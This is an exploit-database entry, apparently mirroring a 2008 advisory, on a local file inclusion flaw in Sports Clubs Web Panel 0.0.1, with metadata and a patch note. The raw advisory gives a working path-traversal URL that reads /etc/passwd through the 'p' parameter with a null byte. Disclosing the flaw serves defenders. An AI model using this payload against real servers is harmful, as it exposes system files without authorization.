header-logo
Suggest Exploit
vendor:
Sports Clubs Web Panel
by:
StAkeR
7.5
CVSS
HIGH
LFI
98
CWE
Product Name: Sports Clubs Web Panel
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:sportspanel:sportspanel:0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability

Sports Clubs Web Panel 0.0.1 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'p' parameter. This can allow an attacker to read sensitive files on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

--==+============================================================================+==--
--==+   Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability          +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 11 Sep 2008
 [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370

 [*] Vulnerability:
 
 [*] LFI
 [+] index.php?p= [File %00]
 [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00

# milw0rm.com [2008-09-11]